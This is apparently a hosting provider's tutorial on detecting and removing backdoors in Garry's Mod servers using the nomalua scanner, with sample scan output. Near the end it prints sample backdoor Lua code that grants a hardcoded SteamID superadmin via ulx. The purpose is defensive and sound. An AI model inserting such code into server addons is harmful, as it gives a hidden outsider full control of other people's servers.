How to detect and remove a backdoor on GMod?

How to detect and remove a backdoor on GMod?

This little script will help you to detect backdoors that may be on your server. Don't forget, the best way to don't have backdoor: DON'T USE LEAKS!

Install Backdoor Scanner

  1. Download the nomalua script: here.
  2. Upload it in a folder garrysmod/addons/nomalua on your server.
  3. Restart your server to take effect.
  4. Once on your server is restarted, open the console and type the command nomalua_scan.
  5. Your server may be laggy for about 15/20 seconds. Re-open the server console; there must be something like this:
    1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
    4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
    1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" )
    1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt")
    1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" )
    4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
    2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 © Guillaume (STEAM_0:0:71249946)
    1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
    2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
    1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end )
    1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
    [size=85][font=Helvetica Neue, Helvetica, Arial, sans-serif]2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size]
    2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
    2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN) 

How to find a backdoor?

  1. To identify a backdoor, you have to look at all SteamIDs. For example:
    AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
    That is not a backdoor. It's just the name of a legit player.
  2. A backdoor looks like this:
    2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then

  3. If you have:
    ply:SteamID() == "STEAM_0:100000000") then

    It's possibly a backdoor. You always have to check something like that! A backdoor can be something like:
    if ( ply:SteamID() == "STEAM_0:1:00000000") then  RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

How to remove a backdoor?

To remove the entire backdoor, remove the code (which can look like this):

concommand.Add( "Nestor", function(ply)  if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)


GMod Server Hosting
Discover mTxServ on Discord   Join the community